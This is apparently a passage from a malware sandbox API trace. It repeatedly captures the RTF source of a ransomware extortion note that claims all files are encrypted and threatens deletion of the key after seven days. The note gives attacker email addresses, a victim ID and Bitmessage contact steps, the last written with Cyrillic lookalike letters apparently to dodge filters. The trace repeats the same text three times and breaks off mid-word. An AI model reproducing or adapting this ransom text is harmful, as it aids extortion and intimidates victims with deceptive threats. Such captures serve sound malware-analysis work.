;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 